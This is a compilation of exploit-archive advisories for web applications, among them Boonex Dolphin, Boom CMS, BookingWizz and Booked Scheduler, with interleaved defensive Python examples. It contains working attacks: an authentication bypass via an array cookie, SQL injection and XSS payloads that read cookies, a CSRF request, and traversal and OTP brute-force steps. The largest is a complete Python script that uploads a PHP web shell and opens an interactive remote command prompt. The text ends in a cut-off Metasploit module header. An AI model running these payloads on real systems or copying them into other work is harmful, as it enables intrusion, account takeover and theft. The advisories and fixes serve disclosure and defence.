
# Exploit Title     : Boonex Dolphin all versions <= 7.3 Authentication Bypass
# Exploit Author    : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link     : https://www.boonex.com
# Author HomePage   : http://security-geeks.blogspot.com
 

Proof of Concept

File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
 
$passwd is equal to Cookie parameter memberpassword
 
Bug:
According to the PHP documentation, strcmp() compares two strings. But what if we provide an array instead? On the PHP versions this affects, strcmp() then emits a warning and returns NULL rather than a number, and the check `NULL != 0` evaluates to false, so the password comparison is treated as a match.
 
So, a simple bypass is to set two cookies in the browser:
memberID=1
memberPassword[]=blah --->array
 
This allows the attacker to bypass authentication and also enter the admin panel.
 
#Independent Pakistani Security Researcher
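As an added defender-side illustration (Python, not part of the advisory above), the following models how a cookie named memberPassword[] arrives on the server as an array rather than a string, and shows the check the comparison should have made instead: reject any value that is not a string, then compare in constant time. The parser, the function names and the sample account are this example's own constructions.

```python
import hmac
from urllib.parse import unquote


def parse_cookies_php_style(header: str) -> dict:
    """Parse a Cookie header the way PHP fills $_COOKIE.

    A name ending in "[]" is collected into a list, which is exactly how the
    cookie memberPassword[]=blah becomes an array on the server side.
    """
    cookies: dict = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        name, value = unquote(name), unquote(value)
        if name.endswith("[]"):
            cookies.setdefault(name[:-2], []).append(value)
        else:
            cookies[name] = value
    return cookies


def password_matches(stored: str, supplied) -> bool:
    """Type-checked, constant-time comparison.

    The Dolphin check `strcmp($aProfile['Password'], $passwd) != 0` is skipped
    when $passwd is an array, because strcmp() then yields NULL instead of a
    non-zero number. Requiring a str here means a list can never match.
    """
    if not isinstance(supplied, str) or not isinstance(stored, str):
        return False
    return hmac.compare_digest(stored.encode(), supplied.encode())


def authenticate(cookie_header: str, accounts: dict) -> bool:
    """True only when memberID names a known account and memberPassword is a
    string equal to that account's stored credential."""
    cookies = parse_cookies_php_style(cookie_header)
    member_id = cookies.get("memberID")
    if not isinstance(member_id, str) or member_id not in accounts:
        return False
    return password_matches(accounts[member_id], cookies.get("memberPassword"))


# Constructed sample data: one account whose stored credential is a plain token.
# (A real deployment stores a password hash and verifies it with a hash function.)
ACCOUNTS = {"1": "correct-horse-battery-staple"}

if __name__ == "__main__":
    print(authenticate("memberID=1; memberPassword=correct-horse-battery-staple", ACCOUNTS))  # True
    print(authenticate("memberID=1; memberPassword[]=blah", ACCOUNTS))  # False
```

The same idea applies in PHP itself: check `is_string($passwd)` before the comparison and use `hash_equals()` rather than `strcmp()`.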
            
source: https://www.securityfocus.com/bid/50286/info

Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.

http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) ) 
            
# Exploit Title: Boom CMS v8.0.7 - Cross Site Scripting
References (Source): https://www.vulnerability-lab.com/get_content.php?id=2274
Release Date: 2023-07-03
Vulnerability Laboratory ID (VL-ID): 2274

Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life
easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.
It gives editors control but doesn't require any technical knowledge.

(Copy of the Homepage:https://www.boomcms.net/boom-boom )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.


Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.
The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise
browser-to-web-application requests from the application side.

The vulnerability is located in the album title and album description input fields of the asset-manager module.
Attackers with low privileges are able to add their own malformed albums with malicious script code in the title and description.
After the injection, the albums are displayed in the backend, where the execution takes place on preview of the main assets.
The attack vector of the vulnerability is persistent and the request method used to inject is POST. The validation tries to parse
the content by escaping with a backslash. This has no effect on injected scripts, because it is only performed for double and
single quotes to prevent SQL injection.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] assets-manager (album)

Vulnerable Function(s):
[+] add

Vulnerable Parameter(s):
[+] title
[+] description

Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduction of the persistent cross site web vulnerability!


Payload(s):
><script>alert(document.cookie)</script><div style=1
<a onmouseover=alert(document.cookie)>test</a>


--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin:https://localhost:8000
Connection: keep-alive
Referer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>",
"slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by"
:null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}
-
PUT: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie: Max-Age=7200; path=/
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
Max-Age=7200; path=/; httponly
Content-Length: 242
Connection: Keep-Alive
Content-Type: application/json
-
https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUF
VV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtY
yOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;
-
GET: HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache, private
Set-Cookie:
Vary: Accept-Encoding
Content-Length: 7866
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-


Vulnerable Source: asset-manager/albums/[ID]

<li data-album="36">
<a href="#albums/20">
<div>
<h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>
<p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
<p class='count'><span>0</span> assets</p>
</div>
</a>
</li>
</iframe></p></div></a></li></ul></div></div>
</div>

<div id="b-assets-view-asset-container"></div>
<div id="b-assets-view-selection-container"></div>
<div id="b-assets-view-album-container"><div><div id="b-assets-view-album">
<div class="heading">
<h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>
<p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>
</div>


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the vulnerable title and description parameters.
Restrict the input fields and disallow the use of special characters. Sanitize the output listing location to prevent further attacks.
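The technical description above makes a point worth seeing in code: escaping only quotes (an anti-SQL-injection habit) does nothing against a tag or an event handler. As an added example (Python, not the project's code), the album fragment from the advisory's vulnerable source is rendered once through a quote-only filter of the kind described and once through proper HTML entity encoding, and both advisory payloads are checked for surviving active content. The same output-encoding fix applies to the Book Store Management System and Bontq cross-site scripting entries further down this page. The regex and function names are this example's own.

```python
import html
import re

# The two payloads published in the advisory, used here purely as test input.
PAYLOADS = [
    '><script>alert(document.cookie)</script><div style=1',
    '<a onmouseover=alert(document.cookie)>test</a>',
]

# A <script> tag, or any tag carrying an on* event handler, still present after
# filtering means the output is script-capable.
ACTIVE_CONTENT = re.compile(r"<\s*script|<\s*\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def quote_escape_only(value: str) -> str:
    """The filtering the advisory describes: single and double quotes are
    backslash-escaped, everything else (tags, event handlers) passes through."""
    return value.replace("'", "\\'").replace('"', '\\"')


def render_album(title: str, description: str, encode) -> str:
    """Render the album listing fragment from the advisory, passing each
    field through the supplied encoding function."""
    return (
        "<div>\n"
        f"<h3>{encode(title)}</h3>\n"
        f'<p class="description">{encode(description)}</p>\n'
        "</div>"
    )


def render_safely(title: str, description: str) -> str:
    """Context-correct fix for an HTML text node: encode <, >, &, ' and " as entities."""
    return render_album(title, description, html.escape)


def contains_active_content(fragment: str) -> bool:
    return ACTIVE_CONTENT.search(fragment) is not None


if __name__ == "__main__":
    for p in PAYLOADS:
        print("quote-only filter :", contains_active_content(render_album(p, p, quote_escape_only)))  # True
        print("entity encoding   :", contains_active_content(render_safely(p, p)))                   # False
```

Encoding belongs at the output location and must match the context (HTML text here; attribute, URL and JavaScript contexts each need their own encoder), which is why the advisory's fix mentions the output listing and not only the input fields.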


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
            
# Exploit Title: Bookwyrm v0.4.3 - Authentication Bypass
# Date: 2022-08-4
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/bookwyrm-social/bookwyrm
# Software Link: https://github.com/bookwyrm-social/bookwyrm/releases/tag/v0.4.3
# Version: <= 4.0.3
# Tested on: MacOS Monterey
# CVE: CVE-2022-2651
# Original Report Link: https://huntr.dev/bounties/428eee94-f1a0-45d0-9e25-318641115550/

Description: Email Verification Bypass Leads To Account Takeover in bookwyrm-social/bookwyrm v0.4.3 Due To Lack Of Ratelimit Protection

# Steps to reproduce:

1. Create an account with the victim's email address
2. When the account is created, the application asks for email confirmation by validating an OTP
Endpoint: https://site/confirm-email
3. Enter any random OTP and try to perform a brute-force attack; if the OTP matches, we can take over that account
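The missing control here is an attempt limit on the confirmation endpoint. As an added example (Python, not Bookwyrm's code), a confirmation-code store that issues a short numeric code but makes it single-use, time-limited and locked after a fixed number of wrong guesses; the clock is injectable so the expiry can be exercised in tests. The class name, limits and the in-memory store are this example's own choices.

```python
import hmac
import secrets
import time


class EmailConfirmation:
    """Confirmation codes with a per-account attempt limit, expiry and single use.

    A 6-digit code has only 10^6 possible values; without the attempt limit the
    endpoint can be brute-forced, which is the flaw the advisory describes.
    """

    def __init__(self, max_attempts: int = 5, ttl_seconds: int = 900, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.ttl = ttl_seconds
        self.clock = clock
        self._pending = {}  # account -> [code, issued_at, failed_attempts]

    def issue(self, account: str) -> str:
        """Issue a fresh code for the account, replacing any earlier one."""
        code = f"{secrets.randbelow(10 ** 6):06d}"
        self._pending[account] = [code, self.clock(), 0]
        return code

    def confirm(self, account: str, supplied: str) -> bool:
        entry = self._pending.get(account)
        if entry is None:
            return False
        code, issued_at, failures = entry
        if self.clock() - issued_at > self.ttl or failures >= self.max_attempts:
            # Expired or locked: discard the code; the user must request a new one.
            del self._pending[account]
            return False
        if hmac.compare_digest(code.encode(), supplied.encode()):
            del self._pending[account]  # single use
            return True
        entry[2] += 1
        return False

    def attempts_left(self, account: str) -> int:
        entry = self._pending.get(account)
        return 0 if entry is None else max(0, self.max_attempts - entry[2])


if __name__ == "__main__":
    store = EmailConfirmation()
    code = store.issue("user@example.com")   # constructed sample account
    print(store.confirm("user@example.com", "000000"))  # almost certainly False
    print(store.attempts_left("user@example.com"))       # 4
```

A per-IP rate limit on top of the per-account lockout closes the remaining avenue of spreading guesses across many accounts.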
            
# Exploit Title: BookingWizz Booking System 5.5 - 'bs-services-add.php' SQL Injection
# Dork: N/A
# Date: 27.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/booking-system/87919
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : The service editing page on the admin panel is vulnerable.
An attacker can access the entire database using this vulnerability in the
'id' parameter.
====================================================

# PoC : SQLi :

http://www.site.com/booking/bs-services-add.php?id=2

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (6769=6769) THEN 6769 ELSE 6769*(SELECT
6769 FROM INFORMATION_SCHEMA.PLUGINS) END))

====================================================
            
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs:  Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince


2. CREDIT
========================================
These vulnerabilities were identified during an external penetration test
by Mehmet INCE from PRODAFT / INVICTUS

Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability

PR1 - Default Administrator Credentials
========================================
File: install.php

People are too lazy to change default credentials unless the application
forces them to do so.

Line 128: <br />Default username/password: <b>admin/pass</b></div>";


PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation on

Line 24: $serviceID = (!empty($_REQUEST["serviceID"])) ? strip_tags(str_replace("'", "`", $_REQUEST["serviceID"])) : getDefaultService();

Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a href="index.php?serviceID=<?php echo $serviceID?>"><?php echo CALENDAR?></a></strong>

Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)


PR3 - Local File Inclusion
========================================
File:config.php

The lang variable is under user control.

Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'", "`", $_REQUEST["lang"])) : 'english';

The user-controlled variable is then stored in a session variable.

Line 36 - 38 :

if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
    $_SESSION['curr_lang'] = $lang;
}

It is then used with the include function, which causes a straightforward file
inclusion.

Line 60 - 68:

$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
    include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
    print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not found";
    exit();
}

PR4 - SQL Injection
========================================
We have seen a lot of potential SQL injection vulnerabilities during the code
review.
Two examples of these potential points are given below.

File : ajax/checkDeletedServices.php

line 19 - 20:

$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';

Line 26:

if($type=='service'){
    $service = getService($id);
    $name = $service['name'];
}

This function executes a query with the $id parameter, which is user input passed
through the checkDeletedServices.php file.
function getService($id, $field=null) {

    $sql = "SELECT * FROM bs_services WHERE id='{$id}'";
    $res = mysql_query($sql);
    if ($field == null) {
        return mysql_fetch_assoc($res);
    } else {
        $row = mysql_fetch_assoc($res);
        return $row[$field];
    }
}


File : ajax/checkChangeAvailability.php

Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');


The getServiceSettings function calls another function named getService,
which is also vulnerable to SQL injection.

function getServiceSettings($id, $field=null) {
    $serviceType = getService($id,'type');
    if($serviceType=='t'){
         $sql = "SELECT * FROM bs_service_settings bss
                INNER JOIN bs_services bs ON bss.serviceId  = bs.id
                WHERE bss.serviceID='{$id}'";

    }else{
         $sql = "SELECT * FROM  bs_service_days_settings bsds
                INNER JOIN bs_services bs ON bsds.idService  = bs.id
                WHERE bsds.idService='{$id}'";

    }
    $res = mysql_query($sql);
    $row = mysql_fetch_assoc($res);
    $row['type'] = $serviceType;
    if ($field == null) {
        return $row;
    } else {

        return $row[$field];
    }
}

In order to exploit these flaws, time-based SQLi techniques were used.

Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
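The root cause in getService() and getServiceSettings() is string interpolation of $id into the SQL text; the same class of flaw is behind the BookingWizz 5.5 and Boonex Dolphin SQL injection entries earlier on this page. As an added example (Python with SQLite, not the application's code), the vulnerable pattern is placed beside a parameterised query and both are run against the advisory's time-based payload. SQLite has no SLEEP() function, so the vulnerable variant fails with a syntax-level error, which is itself proof that the injected text reached the SQL parser, while the parameterised variant treats the whole string as a value and simply finds no row. The table contents are constructed.

```python
import sqlite3

# The time-based payload from the advisory, used here purely as test input.
PAYLOAD = "1' AND SLEEP(5) AND 'WAlE'='WAlE"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the bs_services table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bs_services (id INTEGER PRIMARY KEY, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO bs_services VALUES (?, ?, ?)",
                     [(1, "Haircut", "t"), (2, "Massage", "d")])
    conn.commit()
    return conn


def get_service_vulnerable(conn, service_id: str):
    """Mirrors getService(): the id is spliced into the SQL text, so a quote
    inside it closes the literal and the remainder is parsed as SQL."""
    sql = f"SELECT * FROM bs_services WHERE id='{service_id}'"
    return conn.execute(sql).fetchone()


def get_service_fixed(conn, service_id: str):
    """Parameterised query: the id is bound as a value and never parsed as SQL."""
    return conn.execute("SELECT * FROM bs_services WHERE id = ?", (service_id,)).fetchone()


def compare(conn, service_id: str) -> tuple:
    """Outcome of both variants for one input; each is 'row', 'no row' or 'SQL error'."""
    try:
        vuln = "row" if get_service_vulnerable(conn, service_id) else "no row"
    except sqlite3.OperationalError:
        # SQLite has no SLEEP(): the error shows the injected text reached the parser.
        vuln = "SQL error"
    fixed = "row" if get_service_fixed(conn, service_id) else "no row"
    return vuln, fixed


if __name__ == "__main__":
    db = make_db()
    print(compare(db, "2"))       # ('row', 'row')
    print(compare(db, PAYLOAD))   # ('SQL error', 'no row')
```

In the original PHP the equivalent fix is a prepared statement (PDO or mysqli) with the id bound as a parameter; the legacy mysql_* functions used in the quoted code offer no such facility.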

PR5 - CSRF
========================================
File: bs-settings.php

This file is responsible for administrator account settings.  Here is the
HTTP POST request.

POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678

-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"


-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"


-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"

test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"

test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"

CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"


-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"

0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"

Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"

1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"

$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"

b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"

english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"

1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"

America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"

0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"

n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"

0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"

n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"

0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"

n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"

cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"

yes
-----------------------------305761854111129072091034307--


There is no CSRF token at all. Furthermore, the application does not validate
the current password.

-- 
Sr. Information Security Engineer
https://www.mehmetince.net
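As an added example (Python, not BookingWizz's code), a settings handler that applies the two controls the CSRF section above says are missing: a session-bound CSRF token that a cross-site form cannot supply, and a current-password check before the password or e-mail can change. The form field names follow the captured request; the class name, the PBKDF2 parameters and the sample account are this example's own choices.

```python
import hashlib
import hmac
import secrets


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """PBKDF2-HMAC-SHA256 password hash; returns (salt, digest)."""
    salt = salt or secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def password_ok(password: str, salt: bytes, digest: bytes) -> bool:
    return hmac.compare_digest(hash_password(password, salt)[1], digest)


class SettingsEndpoint:
    """Models bs-settings.php with a CSRF token and current-password re-authentication."""

    def __init__(self, server_secret: bytes, accounts: dict):
        self.secret = server_secret
        self.accounts = accounts  # username -> {"email": ..., "salt": ..., "digest": ...}

    def csrf_token(self, session_id: str) -> str:
        # Derived from the session id with a server-side secret, so it is unique per
        # session and cannot be computed by an attacker's page, which never sees the cookie.
        return hmac.new(self.secret, session_id.encode(), hashlib.sha256).hexdigest()

    def post_settings(self, session_id: str, user: str, form: dict) -> tuple:
        """Return (accepted, detail) for a settings form submitted in this session."""
        submitted = form.get("csrf_token", "")
        if not hmac.compare_digest(submitted.encode(), self.csrf_token(session_id).encode()):
            return False, "rejected: missing or invalid CSRF token"
        account = self.accounts[user]
        changes_credentials = bool(form.get("new_pass")) or (
            bool(form.get("email")) and form["email"] != account["email"]
        )
        if changes_credentials:
            if not password_ok(form.get("current_pass", ""), account["salt"], account["digest"]):
                return False, "rejected: current password required to change password or email"
            if form.get("new_pass") and form.get("new_pass") != form.get("new_pass2"):
                return False, "rejected: new passwords do not match"
        if form.get("new_pass"):
            account["salt"], account["digest"] = hash_password(form["new_pass"])
        if form.get("email"):
            account["email"] = form["email"]
        if form.get("pcurrency"):
            account["pcurrency"] = form["pcurrency"]
        return True, "settings updated"


if __name__ == "__main__":
    salt, digest = hash_password("hunter2")  # constructed sample credential
    ep = SettingsEndpoint(b"server-secret", {"admin": {"email": "admin@example.com", "salt": salt, "digest": digest}})
    forged = {"email": "test@yopmail.com", "pemail": "test@yopmail.com", "pcurrency": "CAD", "edit_settings": "yes"}
    print(ep.post_settings("sess1", "admin", forged))  # (False, 'rejected: missing or invalid CSRF token')
```

The token must be compared in constant time and tied to the session, not merely present; a static site-wide token would satisfy the first check but not stop a forged request.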
            
# Exploit Title: Bookeen Notea - Directory Traversal
# Date: December 2021
# Exploit Author: Clement MAILLIOUX
# Vendor Homepage: https://bookeen.com/
# Software Link: N/A
# Version: BK_R_1.0.5_20210608
# Tested on: Bookeen Notea (Android 8.1)
# CVE : CVE 2021-45783

# The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function.
# The vulnerability can be triggered like so : 
# - Create a note or use an existing note on the device
# - rename this note ../../../../../../
# - keep touching the note until a menu appears
# - touch to select "export"
# - touch "View"

# Now you can access and explore the device filesystem.
            
# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
# Date: 2020-05-03
# Author: Besim ALTINOK
# Vendor Homepage: https://www.bookedscheduler.com
# Software Link: https://sourceforge.net/projects/phpscheduleit/
# Version: v2.7.7
# Tested on: Xampp
# Credit: İsmail BOZKURT

Description:
----------------------------------------------------------
Vulnerable Parameter: $tn
Vulnerable File: manage_email_templates.php


PoC
-----------

GET
/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***************************
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/booked/Web/admin/manage_email_templates.php
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
            
# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
# Vulnerability founder: AkkuS
# Date: 13/12/2021
# Exploit Author: 0sunday
# Vendor Homepage: https://www.bookedscheduler.com/
# Software Link: N/A
# Version: Booked Scheduler 2.7.5
# Tested on: Kali 2021.2
# CVE: CVE-2019-9581

#!/usr/bin/python3

import sys
import requests
from random import randint


def login():
	login_payload = {
		"email": username,
		"password": password,
		"login": "submit",
		#"language": "en_us"
	}

	login_req = request.post(
		 target+"/booked/Web/index.php",
		 login_payload,
		 verify=False,
		 allow_redirects=True
	 )

	if login_req.status_code == 200:
		print ("[+] Logged in successfully.")
	else:
		print ("[-] Wrong credentials !")
		exit()


	return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]



def upload_shell(csrf):

	boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))

	_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
				"Accept-Language": "en-US,en;q=0.5",
				"X-Requested-With": "XMLHttpRequest",
				"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
				"Origin": target,
				"Connection": "close",
				"Referer": target + "/booked/Web/admin/manage_theme.php?update"

				}

	data =  "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
	data += "Content-Type: application/x-php\r\n\n"
	data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
	data += "-----------------------------"+boundary+"\r\n"
	data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
	data += csrf + "\r\n"
	data += "-----------------------------"+boundary+"--\r\n"

	# In case you need some debugging
	_proxies = {
		'http': 'http://127.0.0.1:8080'
	}

	upload_req = request.post(
		 target+"/booked/Web/admin/manage_theme.php?action=update",
		 headers = _headers,
		 data = data
		 #proxies=_proxies
		 )


def shell():
	shell_req = request.get(target+"/booked/Web/custom-favicon.php")

	if shell_req.status_code == 200:

		print("[+] Uploaded shell successfully")
		print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
	else:
		print("[-] Shell uploading failed")
		exit(1)

	print()
	cmd = ''
	while(cmd != 'exit'):
		cmd = input("$ ")
		shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
		print(shell_req.text)


if len(sys.argv) != 4:
    print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]


request = requests.session()

csrf = login()
upload_shell(csrf)
shell()
            
## 
# This module requires Metasploit: http://metasploit.com/download 
# Current source: https://github.com/rapid7/metasploit-framework 
## 
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking 
 
